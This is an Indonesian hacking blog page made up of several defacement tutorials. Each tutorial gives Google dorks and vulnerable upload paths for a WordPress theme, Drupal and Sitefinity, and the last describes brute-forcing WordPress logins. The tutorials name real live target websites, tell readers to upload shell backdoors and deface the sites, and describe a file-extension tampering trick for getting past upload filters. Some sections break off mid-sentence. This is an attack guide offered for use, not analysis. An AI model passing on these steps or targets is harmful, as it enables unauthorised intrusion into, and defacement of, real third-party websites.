./AnChan

Deface Wordpress Theme Theagency   Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Wordpress Theme Theagency Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini Baiklah ketemu lagi dengan saya Adewa kali ini saya akan memberikan tutorial cara deface metode Wordpress Theme Theagency  Langsung saja  Bahan Bahan : 1. Dork   inurl:/wp-content/themes/theagency  2. Exploit  /wp-content/themes/theagency/includes/uploadify/uploadify.php 3. Csrf  https://ghostbin.com/paste/qh7kb Step by Step Dorking dork di atas di gogle image seperti ini  Cari web vuln menggunakan Exploit  Jika blank berarti Vuln masukan alamat site ke csrf simpan dengan ekstensi html Kemudian buka csrf menggunakan gogle. Upload apa yg ingin kalian upload Done Sumur:http://ryangueltoem.blogspot.co.id/2017/10/deface-wordpress-theme-theagency.html Sekianlah Postingan Dari  .

31337FileExists Exploit and Upload Shell Bahan Bahan : 1. Dork : - "31337FileExists"                 -  "31337FileExists" inurl:"node" 2. Exploit : /sites/default/files/up.php 3. Shell Backdoor :      Shell mini ( Jika Shell biasa tidak support ) :  Download 4. Script Deface :  Download Step By Step : 1. Dorking dulu di Google  "31337FileExists" 2. Pilih Salah Satu Web     Live Target :  http://roundhousearchitecture.com/ 3. Masukkan Exploit :  sites/default/files/up.php     contoh :  http://roundhousearchitecture.com/ sites/default/files/up.php     Jika Vuln akan ada Tempat Upload seperti ini 4. Tinggal Upload deh shell backdoor kalian  Jika sukses akan seperti ini 5. Tinggal masuk deh ke akses shell yang udah di Upload      Akses shell : / sites/default/files/[nama_shell].php     contoh :  http://roundhousearchitecture.com/ sites/default/files/guel.php Dan BeginiLah Hasilnya Terserah Kalian

Deface Metode Drupal File With Tamper Notice Dikit : Sebenarnya Ane mau kasih nama Exploitnya "Sange Hidden File Upload" Knapa?! Karena Masih Fresh 😁 Maklum Baru Nemu, Tapi ahh Sudahlah Gamasuk akal 😆 Langsung saja Tutorialnya 😃 Bahan : 1. File upload =>  edit dulu file .txt yang akan di upload trus save dengan extensi .php.jpg ( knapa?! karena nanti akan di tamper dan hasilnya akan menjadi .php.txt ) 2. Tamper Data ( Gunakan Mozilla ) 3. Dork : -  inurl:"/register?destination=node/" intext:"Allowed file types: png gif jpg"                   ( Kembangi Lagi Biar Lebih Fresh )  Step By Step : 1. Dorking Dulu ke Google  inurl:"/register?destination=node/" intext:"Allowed file types: png gif jpg" 2. Pilih Salah Satu Web     Live Target :  http://alumni.pec.ac.in/user/register?destination=node/77   3. Aktifkan Dulu Tamper Data'nya     Open Menu => Developer => Open Tamper Data

Segini Dulu ya Besok Update Lagi. Sekian Dari Saya./AnChan Special Thanks To Hallucination Cyber

Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ] Sudah Lama Ga ada Postingan nih Blog :'v Cuma mau share Exploit lama yang masih Banyak Targetnya :'v Yaitu "Exploit CMS Sitefinity Editor Dialogs" Mungkin dah ada Yang pernah makenya :'v Langsung Saja... Bahan : 1. shell aspx => Yang belom punya download disini    passwordnya : admin 2. Dork : - inurl:"/Sitefinity/login.aspx"                 - "UserControls/Dialogs"                 - "Sitefinity: Login" 3.  Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx 4. Dan yang paling Penting => "KESABARAN" :'v Step By Step : 1. Dorking dulu ke Google inurl:"/Sitefinity/login.aspx" 2. Pilih Salah Satu Web Target     Live Target : http://www.calstart.org/ 3. Masukkan Exploitnya Site.target/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx     Contoh : http://www.calstart.org/sitefinity/UserControls/Dial

Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce Sesuai dengan judulnya, disini saya akan memberikan tutorial Deface WordPress Dengan Tool BruteForce Online dan dengan Menggunakan Python WordPress BruteForce. Yah.. Dua cara satu postingan ^_^ Pertama Tutorial WP BruteForce Menggunakan Python WordPress BruteForce Bahan : Python         Script Python           NB : Setelah Python Terinstal, copy script python lalu save dengan format .py Wordlist Dork : - inurl:wp-login.php            - Author/admin "text" Step By Step : 1. Cari dulu site WP yang akan di WP BruteForce menggunakan dork diatas 2. Cari username WP-nya dengan menggunakan tools ada searching google :v Use Your Brain :'v     cara mudahnya dengan memasukkan username "admin" lalu memasukkan password asal dulu Jika muncul Notif seperti dibawah ini berarti usernamenya admin 3. Tinggal kita BruteForce Passwordnya 4. Instal Dahulu Python-nya 5. Setelah